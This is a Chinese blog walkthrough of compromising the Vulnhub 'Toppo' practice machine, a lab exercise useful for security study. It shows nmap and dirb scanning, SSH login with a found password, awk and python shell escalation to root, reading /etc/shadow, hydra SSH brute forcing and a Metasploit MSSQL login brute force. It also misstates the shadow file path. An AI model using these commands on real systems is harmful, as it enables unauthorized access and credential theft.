Toppo靶机渗透

最新推荐文章于 2024-07-17 15:44:23 发布
最新推荐文章于 2024-07-17 15:44:23 发布
阅读量342 收藏 1
点赞数
文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56306210/article/details/128288146
版权

虚拟机镜像下载地址

1、https://download.vulnhub.com/toppo/Toppo.zip
2、https://download.vulnhub.com/toppo/Toppo.zip.torrent

VMware新建虚拟机-配置虚拟机-将镜像配置好后打开

安装好后

配置虚拟机网络编辑-nat模式-将靶机配置与kali一个网段e684b25e1828f67e4d90cfd1c816527f.png

信息搜集:

1、搜索靶机IP地址

arp-scan -l0d09f5f2666c38b68e4aae1127c60359.png

2、namp扫描该主机开放的所有端口

nmap -T4 -A -v 192.168.245.247

3、浏览器测试访问80端口9afcbfe6e9e5bd8c4af0200ca1d2f3a3.png

知识补充:

111端口:SUN公司的RPC服务所有端口 ??

80端口:超文本传输协议端口8080端口同80端口

22端口:Ssh远程连接服务器端口

3、根据80端口进行web爬行扫描

kaliLinux系统dirb工具使用

dirb http://192.168.245.247

 

4、扫目录发现admin的页面,进行访问: http://192.168.245.247/admin

页面中还有一个notes.txt文件77794177b1b3de2cdfcd865014edc229.png

 5、通过开放的22号端口 远程登陆一下

ssh 192.168.245.247 -l ted

6、远程登录后就可以进行提权

find / -perm -u=s -type f 2>/dev/null

at /etc/sudoers

发现不需要密码的awk

7、直接python命令提权 ??

1\mawk 'BEGIN {system("/bin/sh")}'

2\python2.7 -c 'import pty;pty.spawn("/bin/sh")'

 

拿到flag

知识点:

进入到服务器后

利用内核栈溢出提权

信息收集:

linux密码文件路径为etc/bin/shadow

当前 系统的内核版本

uname -a

查看发行版本

cat /etc/issue

cat /etc/*-release

查看shadow文件

more /etc/shadow

查看passwd文件

more passwd

hydra暴力破解root账户

Windows下载:GitHub - maaaaz/thc-hydra-windows: The great THC-HYDRA tool compiled for Windows

hydra -l root -P C:\Users\Monster\Desktop\网安\弱密码爆破\服务器密码.txt -t 6 ssh://192.168.245.247

登陆账户root,密码test123

利用msf 爆破1433端口:192.168.10.251

(1)use auxiliary/scanner/mssql/mssql_login

(2)set RHOSTS 192.168.109.139

(3)set USER_FILE /home/xh/shentou/usr_mysql.txt

(4)set PASS_FILE /home/xh/shentou/pwd_mysql.txt

(5)run

 

咩了个咩咩
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups 该备忘单针对CTF玩家和初学者,可帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章。... 基本渗透 BSides Vancuver:2018年 Toppo:1 Billu Box 2 基
靶机渗透】入门级Toppo靶机渗透练习
serendipity1130的博客
08-30 437
1.主机发现:arp-scan -l,发现靶机ip为192.168.225.148,并进行访问 2.扫描端口,开启了80,22端口 nmap 192.168.225.148 -sV -sC -Pn -n -v -T5 -p- 3.扫目录发现admin的页面,进行访问: dirb http://192.168.225.148 3.发现note.txt,根据提示:他不懂技术,不会改密码,所以猜测靶机密码为:12345ted123 4.尝试远程登录一下: ssh 19
基于Toppo渗透测试的学习笔记
gaily123的博客
10-09 377
基于Toppo渗透测试的学习笔记 靶机与kali均为NAT模式 kali ip为192.168.79.130 扫描 上nmap扫网段 发现靶机ip为192.168.79.147 扫端口发现22,80,111,42143 进80端口查看,是一个博客 没有什么完善的功能,于是扫后台目录 扫到admin进入发现有一个txt,为以下内容 Note to myself : I need to cha...
Vulnhub靶机练习——Toppo
weixin_45126664的博客
08-05 964
这是一次靶场练习,使用 kali 和 Vulnhub 的Toppo靶机 ,难度属于新手入门 ! 靶机下载地址: 1、https://download.vulnhub.com/toppo/Toppo.zip 2、https://download.vulnhub.com/toppo/Toppo.zip.torrent 知识点: 1、netdiscover发现局域网内靶机IP地址 2、nmap扫描端口、服务、漏洞 3、dirb路径扫描 4、根据发现的端口(服务),尝试相应的探测和攻击 5、cewl搜集页面关
Vulnhub:Toppo 1靶机
qq_43884092的博客
05-02 92
网站中的文件提示密码,cewl收集目标网站信息爆破ssh,拥有suid权限的python提权
DC-1渗透实战
weixin_60719780的博客
04-05 377
目标机:192.168.26.161攻击机:192.168.26.144。
nessie:NeSSie库和用于分析核酸序列对称性元素的工具
05-10
联络人Michele , 出版物: Michele Berselli,Enrico Lavezzo,Stefano Toppo; NeSSie:用于鉴定近似DNA序列对称性的工具,生物信息学,bty142, //doi.org/10.1093/bioinformatics/bty142从源安装NeSSie文件夹中...
端口的含义
chichunhua
02-28 5121
端口概念在网络技术中,端口(Port)大致有两种意思:一是物理意义上的端口,比如,ADSL Modem、集线器、交换机、路由器用于连接其他网络设备的接口,如RJ-45端口、SC端口等等。二是逻辑意义上的端口,一般是指TCP/IP协议中的端口,端口号的范围从0到65535,比如用于浏览网页服务的80端口,用于FTP服务的21端口等等。我们这里将要介绍的就是逻辑意义上的端口。端口分类逻辑意义上的端
渗透测试中的端口利用
原味瓜子、的博客
09-24 2392
文章目录端口渗透图解详解端口渗透 我们在进行渗透测试中,一般情况下会对端口进行扫描,看看服务器中开启了哪些端口,对应的端口一般存在对应的服务,而这些服务可能存在相应的漏洞,下面就是简单结束一下端口对应服务,服务可能对应的漏洞。 端口渗透图解 详解端口渗透 文件共享端口渗透 FTP服务 FTP服务:ftp服务我分为两种情况,第一种是使用系统软件来配置,比如IIS中的FTP文件共享或Linux中的默认服务软件;第二种是通过第三方软件来配置,比如Serv-U还有一些网上写的简易ftp服务器等。 默认端口 20(
vulnhub 之Toppo实战攻略
weixin_43862283的博客
04-14 617
vulnhub 之Toppo实战攻略 0x01 前言 作为信息安全中新入围的小白,实战还是很重要的,就从最基础的开始咯!找了Vulnhub中菜鸟中的菜鸟做的,跟大家分享一下。 0x02 环境及配置 Toppo:1 难度 : Beginner 网卡配置:桥接模式 DHCP 下载地址:: https://download.vulnhub.com/toppo/Toppo.zip 0x03 攻击 第一步,...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
黑客零基础第二章--信息收集第五章-靶机实战Toppo:1
ShadowBlade
08-14 2930
Toppo:1是Vulnhub中easy的一个靶机,仅仅需要简单的信息收集,即可完成intrusion。非常适合我们的这一阶段练习
Vulnhub靶机 Toppo
菜浪马废的博客
04-29 348
找了半天没发现别的东西 就一个密码 看了walkthrough 用户名就是ted 两种方法 内核我没看可不可以 贴个网址 非常好用 传送门
Toppo
weixin_43841336的博客
07-18 199
Nmap -sP 192.168.34.1/24扫描存活主机,确认靶机(192.168.34.156)、 扫描开放端口 访问靶机的web并用dirb扫描 在访问admin是发现了密吗 账号猜一下,密码为12345ted123,可以ssh登录了 最后猜到的账号为ted 用scp上传一个脚本并运行 着可以看到可以执行用awk命令 ...
带妹玩转Vulnhub【一】
BadRer的博客
09-27 7595
前言 题目是不想在刷了,想学一学渗透测试的知识。 由于是开头之作,所以会写的比较的详细,尽量让大家少走弯路。 带妹是不可能带妹的,这辈子都不可能带妹的
VulnHub 靶场--October
Beret-81的博客
04-22 711
VulnHub 靶场--October靶场搭建:靶场渗透:00x1: 信息收集00x2: 漏洞利用00x3: 系统提权00x4: SSH登录 靶场搭建: 下载完导入虚拟机,然后使用默认桥接模式即可。 下载链接:https://www.vulnhub.com/entry/its-october-1,460/ 如果出现IP无法分配可参考: https://www.cnblogs.com/yichen...
VulnHub-toppo
热门推荐
江左盟的博客
06-11 1万+
信息收集 漏洞发现 漏洞利用 q
Evil-WinRM一键测试主机安全情况(KALI工具系列四十四)
最新发布
LNN0212的博客
07-17 802
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版 ,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux 发行版 ,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。注意,一定只能用于自己设备的连通性测试哦!
自建SMTP服务器:如何保障安全稳定的发信?
danplus的博客
07-17 504
自建SMTP服务器虽然可以提供更高的灵活性和控制力,但也需要投入大量的时间和精力来保障其安全和稳定。AokSend,指导您自建SMTP服务器,结合API接口,高效稳定,让邮件营销更加自主可控!
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
haiyunan的博客
07-16 563
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

咩了个咩咩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值